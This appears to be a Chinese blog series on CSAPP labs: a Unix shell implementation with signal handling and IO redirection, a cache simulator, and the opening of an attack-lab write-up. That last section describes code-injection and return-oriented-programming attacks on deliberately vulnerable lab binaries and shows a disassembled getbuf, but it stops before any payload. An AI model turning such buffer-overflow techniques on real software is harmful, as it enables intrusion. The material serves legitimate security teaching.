0%

功能

  • 执行二进制文件
  • 作业控制(前后台切换, 前后台运行, 显示当前所有作业)
  • 支持简单的信号(SIGINT, SIGTSTP, SIGCHLD, SIGQUIT)
  • IO重定向(stdin, stdout)

完整代码: code

流程

流程图

实际的代码需要处理许多问题:

  • 如何维护当前所有作业状态

  • 父进程如何等待前台进程执行完

  • IO 如何在执行一条命令重定向

  • 如何接收键盘,子进程信号

如何维护当前所有作业状态

1
2
3
4
5
6
7
8
struct job_t {              /* The job struct */
pid_t pid; /* job PID */
int jid; /* job ID [1, 2, ...] */
int state; /* UNDEF, BG, FG, or ST */
char cmdline[MAXLINE]; /* command line */
};

struct job_t jobs[MAXJOBS]; /* The job list */

我定义了一个结构体 job_t ,保存

  • 当前作业 pid
  • 作业的 id
  • 当前作业状态
  • 执行此进程的命令

读入命令时,程序会先分析前台还是后台(简单的判断最后一个字符是否为 &)

然后执行

1
addjob(jobs, pid, runbg ? BG : FG, cmdline);

当程序退出,被阻塞或者切换前后时更改对应状态,例如

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
void sigtstp_handler(int sig) 
{

#if DEBUG
printf("sig: %d\n", sig);
fflush(stdout);
printf("sigstophandle\n");
fflush(stdout);
#endif

sigprocmask(SIG_BLOCK, &mask, NULL);
pid_t pid = fgpid(jobs);
struct job_t* job = getjobpid(jobs, pid);
if (job) {
job->state = ST;
fflush(stdout);
kill(-pid, SIGTSTP);
printf("Job [%d] (%d) stoped by signal %d\n", pid2jid(pid), pid, SIGTSTP);
fflush(stdout);
}
sigprocmask(SIG_SETMASK, &prev, NULL);
fflush(stdout);
return;
}

置对应的 job->state为 ST,当父进程收到 SIGTSTP 信号时

父进程如何等待前台进程执行完

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
if ((pid = fork()) < 0){
unix_error("fork error");
}
else if (pid == 0){
/*child process */
setpgid(0, 0);
sigprocmask(SIG_SETMASK, &prev, NULL);
Signal(SIGINT, SIG_DFL);
Signal(SIGTSTP, SIG_DFL);
Signal(SIGCHLD, SIG_DFL);
Signal(SIGQUIT, SIG_DFL);

#if DEBUG
printf("\n");
fflush(stdout);
printf("child process\npid: (%d)", getpid());
fflush(stdout);
printf("cmdline: %s", cmdline);
fflush(stdout);
#endif

execv(argv[0], argv);
/* error */
printf("%s: Command not found\n", argv[0]);
fflush(stdout);
exit(0);
}
else {
/* father process */
prevpid = pid;

每次 fork 时,父进程记录当前子进程 pid

1
2
3
while(prevpid != 0) {
sigsuspend(&emptyset);
}

当 prevpid 不为 0, 一直阻塞

当父进程 SIGCHLD 处理函数发现是子进程发来的信号,置为0, 从而解除阻塞,继续读取命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
while ((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0){
if(pid == prevpid) {
prevpid = 0;
}
if (WIFSTOPPED(status)) {

struct job_t* job = getjobpid(jobs, pid);
if (job->state == ST);
else {
job->state = ST;
printf("Job [%d] (%d) stoped by signal %d\n", pid2jid(pid), pid, SIGTSTP);
fflush(stdout);
}
}
else if(WIFSIGNALED(status)) {
if (WTERMSIG(status) == SIGINT) {
if (getjobpid(jobs, pid) != NULL) {
printf("Job [%d] (%d) terminated by signal %d\n", pid2jid(pid), pid, SIGINT);
fflush(stdout);
}
}
deletejob(jobs, pid);
}
else if(WIFEXITED(status)){

#if DEBUG
printf("退出值为 %d\n", WEXITSTATUS(status));
fflush(stdout);
#endif

deletejob(jobs, pid);
}
else if (WIFCONTINUED(status)) {
printf("continued\n");
fflush(stdout);
}

#if DEBUG
printf("childhandle pid: %d\n", pid);
fflush(stdout);
#endif

}

IO 如何在执行一条命令重定向

得到命令字符串时,传给 ioredirection 函数处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void ioredirection(char** argv) {
int endcmd = 0x7FFFFFFF;
for (int i = 0; argv[i] != NULL; i++) {
if (strcmp(argv[i], "<") == 0) {
isredirect = true;
if(freopen(argv[i+1], "r", stdin) == NULL) {
return unix_error("io redirection error.\n");
}
if(endcmd > i) {
endcmd = i;
}
}
else if (strcmp(argv[i], ">") == 0) {
isredirect = true;
if (freopen(argv[i+1],"a",stdout) == NULL) {
return unix_error("io redirection error.\n");
}
if (endcmd > i) {
endcmd = i;
}
}
}
if(endcmd != 0x7FFFFFFF) {
argv[endcmd] = NULL;
}
}

若存在 > ,打开下一个字符串指定的文件重定向到 stdout

若存在 < ,打开下一个字符串指定的文件重定向到 stdin

每次读取命令的时候判断,如果 标准输入和标准输出被重定向了,恢复

1
2
3
4
5
6
7
8
9
if (isredirect) {
if (freopen("/dev/tty", "r", stdin) == NULL) {
unix_error("io redirection error.");
}
if (freopen("/dev/tty", "w", stdout) == NULL) {
unix_error("io redirection error.");
}
isredirect = false;
}

如何接收键盘,子进程信号

当键盘键入 ctrl+c, 父进程接到 SIGINT 信号,执行信号处理函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void sigint_handler(int sig) 
{

#if DEBUG
printf("sigint handle call\n");
fflush(stdout);
#endif

sigprocmask(SIG_BLOCK, &mask, NULL);
pid_t pid = fgpid(jobs);
struct job_t* job = getjobpid(jobs, pid);
if (job != NULL) {
printf("Job [%d] (%d) terminated by signal %d\n", pid2jid(pid), pid, SIGINT);
fflush(stdout);
deletejob(jobs, pid);
}
sigprocmask(SIG_SETMASK, &prev, NULL);

if (pid) {
kill(-pid, SIGINT);
}
else {
exit(0);
}
return;
}

删除对应的 job_t, 向前台进程发送 SIGINT,之后子进程终止, 父进程调用处理函数回收

效果

输入命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
ardxwe@ardxwe ~/github/CS15-213labs/shlab-handout$ cat trace15.txt
#
# trace15.txt - Putting it all together
#

/bin/echo tsh> ./bogus
./bogus

/bin/echo tsh> ./myspin 10
./myspin 10

SLEEP 2
INT

/bin/echo -e tsh> ./myspin 3 \046
./myspin 3 &

/bin/echo -e tsh> ./myspin 4 \046
./myspin 4 &

/bin/echo tsh> jobs
jobs

/bin/echo tsh> fg %1
fg %1

SLEEP 2
TSTP

/bin/echo tsh> jobs
jobs

/bin/echo tsh> bg %3
bg %3

/bin/echo tsh> bg %1
bg %1

/bin/echo tsh> jobs
jobs

/bin/echo tsh> fg %1
fg %1

/bin/echo tsh> quit
quit

执行结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
ardxwe@ardxwe ~/github/CS15-213labs/shlab-handout$ make test15 
./sdriver.pl -t trace15.txt -s ./tsh -a "-p"
#
# trace15.txt - Putting it all together
#
tsh> ./bogus
./bogus: Command not found
tsh> ./myspin 10
Job [1] (18375) terminated by signal 2
tsh> ./myspin 3 &
[1] (18388) ./myspin 3 &
tsh> ./myspin 4 &
[2] (18390) ./myspin 4 &
tsh> jobs
[1] (18388) Running ./myspin 3 &
[2] (18390) Running ./myspin 4 &
tsh> fg %1
Job [1] (18388) stoped by signal 20
tsh> jobs
[1] (18388) Stopped ./myspin 3 &
[2] (18390) Running ./myspin 4 &
tsh> bg %3
No such job
tsh> bg %1
[1] (18388) ./myspin 3 &
tsh> jobs
[1] (18388) Running ./myspin 3 &
[2] (18390) Running ./myspin 4 &
tsh> fg %1
tsh> quit

内容

实现一个 Linux Shell

主要功能:

  • 执行二进制文件
  • 作业控制(前后台切换, 前后台运行, 显示当前所有作业)
  • 支持简单的信号(SIGINT, SIGTSTP, SIGCHLD, SIGQUIT)
  • IO重定向(stdin, stdout)

完整代码: code

前置知识

我会将此次 lab 涉及到的一些核心知识进行简单的阐述

  • Linux 信号
  • io 重定向
  • Linux 进程

Signal

定义

维基百科: 在计算机科学中,信号(英语:Signals)是Unix、类Unix以及其他POSIX兼容的操作系统中进程间通讯的一种有限制的方式。

它是一种异步的通知机制,用来提醒进程一个事件已经发生。当一个信号发送给一个进程,操作系统中断了进程正常的控制流程,此时,任何非原子操作都将被中断。如果进程定义了信号的处理函数,那么它将被执行,否则就执行默认的处理函数。

信号类似于中断,不同之处在于中断由处理器调解并由内核处理,而信号由内核调解(可能通过系统调用)并由进程处理。内核可以将中断作为信号传递给导致中断的进程(典型的例子有SIGSEGV、SIGBUS、SIGILL和SIGFPE)。

所有的普通信号可以通过 kill-l 查看

1
2
ardxwe@ardxwe ~$ kill -l                                                       
HUP INT QUIT ILL TRAP ABRT BUS FPE KILL USR1 SEGV USR2 PIPE ALRM TERM STKFLT CHLD CONT STOP TSTP TTIN TTOU URG XCPU XFSZ VTALRM PROF WINCH POLL PWR SYS

编号 1 - 31 是普通信号, 32 - 64 是实时信号, 普通信号不支持排队, 可能发生的情况是发送多次信号, 进程只收到了一次, 而实时信号支持排队, 保证所有的信号都将被处理而不会丢失, 通常用于用户。

1
2
3
#include <signal.h>
typedef void(*sighandler_t)(int);
sighandler_t signal(int signum, sighandler_t handler);

可以通过 signal 函数向信号 signum 绑定处理函数, 在执行某一个信号的信号处理函数期间, 收到同样的信号, 此信号会被阻塞。也就是不会被处理。

阻塞信号

信号在内核中分为四类:

  • 信号递达 (delivery) 实际执行信号处理信号的动作。
  • 信号未决 (pending) 信号从产生到抵达之间的状态,信号产生了但是未处理。
  • 忽略,抵达之后的一种动作。
  • 阻塞 (block) 收到信号不立即处理,被阻塞的信号将保持未决状态,直到进程解除对此信号的阻塞,才执行抵达动作。

每个信号都由两个标志位分别表示阻塞和未决,以及一个函数指针表示信号的处理动作。

信号内核实现

  • SIGHUP 未阻塞也未产生过,当它递达时执行默认处理动作。
  • SIGINT 信号产生过,但正在被阻塞,所以暂时不能递达。虽然它的处理动作是忽略,但在没有解除阻塞之前不能忽略这个信号,因为进程仍有机会改变处理动作之后再解除阻塞。
  • SIGQUIT 信号未产生过,一旦产生 SIGQUIT 信号将被阻塞,它的处理动作是用户自定义函数 sighandler。

信号产生但是不立即处理,前提条件是要把它保存在 pending 表中,表明信号已经产生。

也就是说, 内核根据信号对应的 block 和 pending 和 handle 来判断。

block pending signal comes
0 0 handle
1 0 pending = 1
1 1 throw away

信号捕捉

如果信号的处理动作是⽤户⾃定义函数,在信号递达时就调⽤这个函数,这称为捕捉信号。

内核捕捉信号

信号集操作函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <signal.h>
/* 所有信号的对应位清0 */
int sigemptyset(sigset_t *set);

/* 设置所有的信号,包括系统支持的所有信号 */
int sigfillset(sigset_t *set);

/* 在该信号集中添加有效信号 */
int sigaddset(sigset_t *set, int signo);

/* 在该信号集中删除有效信号 */
int sigdelset(sigset_t *set, int signo);

/* 判断一个信号集的有效信号中是否包含某种信号 */
int sigismember(const sigset_t *set, int signo);

/*
* how:
* SIG_BLOCK 信号屏蔽字是其当前信号屏蔽字和set指向信号集的并集,set包含了希望阻塞的信号
* SIG_UNBLOCK 信号屏蔽字是其当前信号屏蔽字和set所指向信号集补集的交集,set包含了希望解除阻塞的信号
* SIG_SETMASK 信号屏蔽字将被set指向的信号集的值代替
*/
int sigprocmask(int how, const sigset_t *restrict set, sigset_t *restrict oset);

/*sigpending读取当前进程的未决信号集,通过set参数传出 */
int sigpending(sigset_t *set);

一些例子

first

验证两点:

  • 当 SIGINT 被阻塞时, 来了一个 SIGINT 只会置 pending 为 1
  • 阻塞解除会执行 siginthandle 一次
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdbool.h>

void printsigset(const sigset_t *pset)
{
for (int i = 0; i < 64; i++)
{
if (sigismember(pset, i + 1))
putchar('1');
else
putchar('0');
fflush(stdout);
}
printf("\n");
fflush(stdout);
}

void siginthandle(int sig) {
printf("sigint handle call\n");
sleep(1);
return;
}

int main() {
signal(SIGINT, siginthandle);

sigset_t sigint, prev;
sigemptyset(&sigint);
sigaddset(&sigint, SIGINT);
sigprocmask(SIG_BLOCK, &sigint, &prev);

int count = 1;
while(true) {
sigset_t now, pending;

printf("block set:");
fflush(stdout);
sigprocmask(SIG_BLOCK, NULL, &now);
printsigset(&now);
sigpending(&pending);
printf("pending set:");
fflush(stdout);
printsigset(&pending);
sleep(1);
count++;
if (count == 5) {
sigprocmask(SIG_SETMASK, &prev, NULL);
}
else if (count == 10) {
break;
}
}
return 0;
}

先阻塞 SIGINT 4秒, 每秒打印 block 和 pending, 然后解除 SIGINT 阻塞

本地运行结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
ardxwe@ardxwe ~/github/CS15-213labs/shlab-handout/signaltest$ ./signal
block set:0100000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000
block set:0100000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000
^Cblock set:0100000000000000000000000000000000000000000000000000000000000000
pending set:0100000000000000000000000000000000000000000000000000000000000000
^C^Cblock set:0100000000000000000000000000000000000000000000000000000000000000
pending set:0100000000000000000000000000000000000000000000000000000000000000
sigint handle call
block set:0000000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000
block set:0000000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000
block set:0000000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000
block set:0000000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000
block set:0000000000000000000000000000000000000000000000000000000000000000
pending set:0000000000000000000000000000000000000000000000000000000000000000

第二次打印结束的时候, 输入 CTRL+C, pending 对应位变为 1, 之后还输入了两次 CTRL+C, pending 不变, 解除阻塞时执行一次处理函数, 非常自然。

second

验证:

  • 系统调用会被信号打断
  • 如果当前正在执行信号一的处理函数, 此时信号二来是有可能打断信号一处理函数, 去执行信号二处理函数的, 类似于中断嵌套
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdbool.h>


void siginthandle(int sig) {
printf("sigint handle call\n");
unsigned int rs = sleep(5);
printf("remain seconds: %d\n", rs);
return;
}

void sigtstphandle(int sig) {
printf("sigtstp handle call\n");
sleep(1);
return;
}

int main() {
signal(SIGINT, siginthandle);
signal(SIGTSTP, sigtstphandle);

sigset_t set;
sigemptyset(&set);
sigaddset(&set, SIGINT);
sigaddset(&set, SIGTSTP);

unsigned int rs = sleep(5);
printf("main routine remain seconds: %d\n", rs);
return 0;
}

注册 SIGINT SIGTSTP 处理函数, 主程序 sleep

结果:

1
2
3
4
5
ardxwe@ardxwe ~/github/CS15-213labs/shlab-handout/signaltest$ ./breaksyscl
^Csigint handle call
^Zsigtstp handle call
remain seconds: 4
main routine remain seconds: 3

IO重定向

Linux文件描述符原理

0 代表 标准输入
1 代表 标准输出
2 代表 标准错误

1
2
3
#include <unistd.h>
int dup(int oldfd);
int dup2(int oldfd, int newfd);

这些系统调用创建文件描述符 oldfd 的副本

dup 使用编号最小的未使用描述符作为新描述符

dup2 使newfd是oldfd的副本,如果有必要, 关闭 newfd

创建进程时, 0, 1, 2 已经指向对应的打开文件表:

文件描述符初始状态

当进程执行 dup(1) :

执行dup(1)之后

执行 打开一个文件时, 指向一个新的打开文件表 :

打开文件

此时 dup2(filefd, 1):

IO重定向

之后向标准输出写就是往文件写, 这就是 io重定向的原理

进程

定义

维基百科: 进程(英语:process),是指计算机中已运行的程序。进程曾经是分时系统的基本运作单位。在面向进程设计的系统(如早期的UNIX,Linux 2.4及更早的版本)中,进程是程序的基本执行实体;在面向线程设计的系统(如当代多数操作系统、Linux 2.6及更新的版本)中,进程本身不是基本运行单位,而是线程的容器。程序本身只是指令、数据及其组织形式的描述,进程才是程序(那些指令和数据)的真正运行实例。若干进程有可能与同一个程序相关系,且每个进程皆可以同步(循序)或异步(平行)的方式独立运行。现代计算机系统可在同一段时间内以进程的形式将多个程序加载到存储器中,并借由时间共享(或称时分复用),以在一个处理器上表现出同时(平行性)运行的感觉。同样的,使用多线程技术(多线程即每一个线程都代表一个进程内的一个独立执行上下文)的操作系统或计算机体系结构,同样程序的平行线程,可在多CPU主机或网络上真正同时运行(在不同的CPU上)。

简单说, 当我们运行一个可执行文件 ./a.out 时, 操作系统就创建了进程

fork

在 Linux 中, 当我们调用 fork, 操作系统帮我们产生一个新的进程, 和原先的进程几乎完全相同

原先进程称为父进程, 派生的进程称为子进程

Linux 还采用了写时复制, 当子进程创建, 并不会完全拷贝内存, 而是共享内存页, 只有当父子进程写的时候, 才会给子进程分配新的内存页, 然后才会执行对应的写操作

fork

父子进程共享内存, 当然也共享代码段, 父子进程如何执行代码段?

检查 fork 返回值, 子进程返回 0, 父进程返回子进程 pid, 这样做的理由是, 子进程可以调用 getppid 获取父进程 pid, 一个进程只能有一个父进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
pid_t pid;

if((pid=fork()) < 0) {
printf("fork error\n");
return -1;
}
else if (pid == 0) {
/* child process */
...
}
else {
/* father process */
...
}

有了这些前置知识, shell 的实现就会很容易, 见下章

参考:

https://gohalo.me/post/kernel-signal-introduce.html

http://c.biancheng.net/view/3066.html

https://zh.wikipedia.org/wiki/%E8%A1%8C%E7%A8%8B

https://zh.wikipedia.org/wiki/Signal_(%E8%BB%9F%E4%BB%B6)

关于课程

这门课程围绕 CSAPP 展开。

书本相关的所有信息,你可以在 这里 找到。

你可以在 Bilibili 或者 YouTube 查看所有的课程视频,Bilibili附带中文字幕。

建议看完相应的章节然后去做相应的实验。大名鼎鼎的 CSAPP 的作者即是这门课程的讲师。你可以在 这里 找到实验相关的所有内容。

这门课程的实验代码可以在我的 Github 找到我的所有解答及相关资料。本次实验相关代码在 ./cachelab-handout 文件夹下。

cache lab

文档

点击 这里, 然后点击圆圈处 Self-Study Handout 即可下载此次实验对应的文档。

解压之后文件夹对应目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
➜  下载 tree cachelab-handout
cachelab-handout
├── cachelab.c
├── cachelab.h
├── csim.c
├── csim-ref
├── driver.py
├── Makefile
├── README
├── test-csim
├── test-trans.c
├── tracegen.c
├── traces
│   ├── dave.trace
│   ├── long.trace
│   ├── trans.trace
│   ├── yi2.trace
│   └── yi.trace
└── trans.c

1 directory, 16 files
  • cachelab.c: 一些需要的辅助函数
  • cachelab.h: cachelab.c 对应头文件
  • csim.c: 需要编写的 A 部分: cache 模拟器
  • csim-ref: 可执行文件, 可以用来做参考的 cache 模拟器, 可以验证我们编写的模拟器的正确性
  • driver.py: 运行 test-csim 和 test-trans
  • Makefile: 编译代码
  • README: CMU 给出的相关说明, 我编写的文件介绍基本是翻译此文件中的内容 -> 说明文件
  • test-csim: 可执行文件, 测试我们编写的 cache 模拟器
  • test-trans.c: 测试我们实验B的正确性
  • tracegen.c: test-trans.c 的一些辅助函数
  • traces/ : 文件夹, 被 test-csim.c 使用的踪迹文件
  • trans.c: 需要编写的 B 部分: 转置函数

内容

A: 编写简单的缓存模拟器
B: 优化矩阵转置以最大限度减少缓存未命中次数

环境

LINUX

过程

分析

实验官方说明文件 cachelab

PART A

这是我编写的 csim.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <math.h>
#include <unistd.h>

// #define NDEBUG
#define print(x) if (infoflag) printf(x)

#include "cachelab.h"
#include "assert.h"

void getaddrfromline(char* buff, char* result);
long getlownnumber(long addr, long n);

int main(int argc, char* argv[])
{
// 记录次数
long hit_count = 0;
long eviction_count = 0;
long miss_count = 0;

// 缓存相关数据
long tagbits = 0;
long setsbits = 0;
long linesperset = 0;
long blockbits = 0;

// 文件名
char* filename = NULL;

// 是否输出具体信息
bool infoflag = false;

// 文件
FILE* fp = NULL;

// 实现 LRU 变量
long max = 1;

// 解析命令行参数
for (long i=1; i<argc; i++){
size_t length = strlen(argv[i]);
assert(length == 2);
switch (argv[i][1])
{
case 'v':
infoflag = true;
break;

case 's':
setsbits = atoi(argv[++i]);
break;

case 'E':
linesperset = atoi(argv[++i]);
break;

case 'b':
blockbits = atoi(argv[++i]);
break;

case 't':
filename = argv[++i];
break;

default:
fprintf(stderr, "Parameter error, you should use -v -s number -E number -b number -t filename");
return -1;
}

}

// 地址剩余位数应该为 tag 的位数
tagbits = sizeof(void*) * 8 - setsbits - blockbits;

assert(tagbits > 0);

// cache块数
long count = (1 << setsbits) * linesperset;

// tag 和 used 用来模拟 cache
// calloc: malloc and memset 0
long* tagptr = calloc(count, sizeof(long));
long* usedptr = calloc(count, sizeof(long));

if (usedptr == NULL || tagptr == NULL){
fprintf(stderr, "calloc error.");
return -1;
}

fp = fopen(filename, "r");

char buff[1024];
char number[1024];
long addr;

long set;
long tag;

while (fgets(buff, 1024, fp) != NULL) {
memset(number, 0, 1024);

// 忽略 I 开头的行
if(*(buff) == 'I')continue;

// 去掉行尾回车
if(buff[strlen(buff)-1] == '\n')buff[strlen(buff)-1] = '\0';

// 去掉行头空格
if(infoflag && buff[0] == ' ') {
printf("%s ", buff + 1);
}
else if (infoflag) {
printf("%s ", buff);
}

// 得到地址 存于 number
getaddrfromline(buff, number);
sscanf(number, "%lx", &addr);

// 得到地址对应的 tag set
tag = getlownnumber(addr >> (blockbits + setsbits), tagbits);
set = getlownnumber(addr >> blockbits, setsbits);

// cache 行
long* nowptr = usedptr + set * linesperset;

long* this = nowptr;

bool allone = true;

// 试图找到 tag
for (int i=0; i < linesperset; i++) {
if (*this != 0) {
if (*(tagptr + set * linesperset + i) == tag) {
if (*(buff+1) == 'M') {
print("hit hit \n");
hit_count++;
}
else {
print("hit \n");
}
(*this) = max++;
hit_count++;
goto ff;
}
}
else allone = false;
this++;
}

long index = 0;

// 有空余块
if (allone == false) {
this = nowptr;
for (int i=0; i < linesperset; i++) {
if (*this == 0) {
*(tagptr + set * linesperset+i) = tag;
break;
}
this++;
}
*this = max++;
if (*(buff+1) == 'M') {
print("miss hit \n");
hit_count++;
*this = max++;
}
else {
print("miss \n");
}
miss_count++;
}

// 驱逐
else {
long min = 0x7FFFFFFFFFFFFFFF;
this = nowptr;
for (int i=0; i < linesperset; i++) {
if (*this != 0 && ((*this) < min)) {
min = *this;
index = i;
}
this++;
}
*(tagptr + set *linesperset + index) = tag;
*(nowptr + index) = max++;
if (*(buff+1) == 'M') {
print("miss eviction hit \n");
hit_count++;
}
else {
print("miss eviction \n");
}
miss_count++;
eviction_count++;
}
ff:;
}

printf("hits:%ld ", hit_count);
printf("misses:%ld ", miss_count);
printf("evictions:%ld\n", eviction_count);
// printSummary(hit_count, miss_count, eviction_count);
free(tagptr);
free(usedptr);
fclose(fp);
return 0;
}

void getaddrfromline(char* buff, char* result) {
long start = 0;
long end = 0;

for (long i=0; ; i++) {
if ((buff[i] == ' ') && (i != 0) &&(buff[i+1] != ' ')) {
start = i + 1;
}
else if (buff[i] == ',') {
end = i;
break;
}
}
strncpy(result, buff + start, end - start);
}

long getlownnumber(long addr, long n) {
long x = 1;
for (long i=1; i<n; i++) x = x | (x << 1);
return x & addr;
}

代码非常清晰: 首先解析命令行参数, 获取缓存参数以及是否打印详细信息的标志, 然后 malloc 对应大小的 tag 和 used(因为需要使用最近最久未使用算法驱逐对应的块), 之后读取参数的 trace 文件, 打印每一次缓存命中情况。这里获取命令行参数没有使用 说明文件 推荐的 getopt 函数, 因为我觉得直接通过 argc 和 argv 挺方便。

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜  cachelab-handout git:(master) make      
gcc -g -Wall -Werror -std=c99 -m64 -o csim csim.c cachelab.c -lm
gcc -g -Wall -Werror -std=c99 -m64 -O0 -c trans.c
gcc -g -Wall -Werror -std=c99 -m64 -o test-trans test-trans.c cachelab.c trans.o
gcc -g -Wall -Werror -std=c99 -m64 -O0 -o tracegen tracegen.c trans.o cachelab.c
# Generate a handin tar file each time you compile
tar -cvf ardxwe-handin.tar csim.c trans.c
csim.c
trans.c
➜ cachelab-handout git:(master) ✗ ./test-csim
Your simulator Reference simulator
Points (s,E,b) Hits Misses Evicts Hits Misses Evicts
3 (1,1,1) 9 8 6 9 8 6 traces/yi2.trace
3 (4,2,4) 4 5 2 4 5 2 traces/yi.trace
3 (2,1,4) 2 3 1 2 3 1 traces/dave.trace
3 (2,1,3) 167 71 67 167 71 67 traces/trans.trace
3 (2,2,3) 201 37 29 201 37 29 traces/trans.trace
3 (2,4,3) 212 26 10 212 26 10 traces/trans.trace
3 (5,1,5) 231 7 0 231 7 0 traces/trans.trace
6 (5,1,5) 265189 21775 21743 265189 21775 21743 traces/long.trace
27

TEST_CSIM_RESULTS=27

都正确。 加入 -v 查看输出是否一致:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜  cachelab-handout git:(master) ✗ gcc -o csim csim.c                                     
➜ cachelab-handout git:(master) ✗ ./csim -v -s 4 -E 1 -b 4 -t traces/yi.trace > 1.txt
➜ cachelab-handout git:(master) ✗ ./csim-ref -v -s 4 -E 1 -b 4 -t traces/yi.trace > 2.txt
➜ cachelab-handout git:(master) ✗ diff 1.txt 2.txt
➜ cachelab-handout git:(master) ✗ cat 1.txt
L 10,1 miss
M 20,1 miss hit
L 22,1 hit
S 18,1 hit
L 110,1 miss eviction
L 210,1 miss eviction
M 12,1 miss eviction hit
hits:4 misses:5 evictions:3
➜ cachelab-handout git:(master) ✗ cat 2.txt
L 10,1 miss
M 20,1 miss hit
L 22,1 hit
S 18,1 hit
L 110,1 miss eviction
L 210,1 miss eviction
M 12,1 miss eviction hit
hits:4 misses:5 evictions:3

一切都一样。

PART B

我不会。

关于课程

这门课程围绕 CSAPP 展开。

书本相关的所有信息,你可以在 这里 找到。

你可以在 Bilibili 或者 YouTube 查看所有的课程视频,Bilibili附带中文字幕。

建议看完相应的章节然后去做相应的实验。大名鼎鼎的 CSAPP 的作者即是这门课程的讲师。你可以在 这里 找到实验相关的所有内容。

这门课程的实验代码可以在我的 Github 找到我的所有解答及相关资料。本次实验相关代码在 ./attacklab-handout 文件夹下。

attack lab

文档

点击 这里, 然后点击圆圈处 Self-Study Handout 即可下载此次实验对应的文档。

解压之后文件夹对应目录:

1
2
3
4
5
6
7
8
9
10
11
➜  下载 tree attacklab-handout
attacklab-handout
└── target1
├── cookie.txt
├── ctarget
├── farm.c
├── hex2raw
├── README.txt
└── rtarget

1 directory, 6 files
  • cookie.txt: 4字节签名的文本文件
  • ctarget: 具有代码注入漏洞的Linux二进制文件,用于阶段作业的1-3
  • farm.c: 此rtarget实例中存在小工具场的源代码,可以编译(使用-Og标志)并反汇编以查找小工具,更多信息查看 实验官方说明文件
  • hex2raw: 生成字节序列的实用程序。 更多信息查看 实验官方说明文件
  • README.txt: 官方简单说明文件
  • rtarget: Linux二进制文件,具有面向返回的编程漏洞,用于分配的阶段4-5

内容

为学生提供了一对独特的定制生成的x86-64二进制可执行文件,称为target,它们具有缓冲区溢出错误。

一个目标很容易受到代码注入攻击。另一个容易受到面向返回的编程攻击的攻击。

要求学生通过基于代码注入或面向返回的编程开发漏洞利用程序来修改目标的行为。该实验室向学生讲授堆栈规程,并教给他们写易受缓冲区溢出攻击的代码的危险。

环境

LINUX

过程

分析

实验官方说明文件: attacklab

运行 ctarget:

1
2
➜  target1 git:(master) ./ctarget       
FAILED: Initialization error: Running on an illegal host [ardxwe]

查阅相关资料知道需要加上 -q 标志:

1
2
3
➜  target1 git:(master) ./ctarget -q
Cookie: 0x59b997fa
Type string:

一切正常。

level1

毫无疑问,反汇编。

1
➜  target1 git:(master) objdump -d ctarget > ctarget.s

目标: getbuf 函数使用缓冲区溢出技术使程序执行 touch1 函数

首先查看 getbuf 函数汇编代码:

1
2
3
4
5
6
7
8
9
00000000004017a8 <getbuf>:
4017a8: 48 83 ec 28 sub $0x28,%rsp
4017ac: 48 89 e7 mov %rsp,%rdi
4017af: e8 8c 02 00 00 callq 401a40 <Gets>
4017b4: b8 01 00 00 00 mov $0x1,%eax
4017b9: 48 83 c4 28 add $0x28,%rsp
4017bd: c3 retq
4017be: 90 nop
4017bf: 90 nop

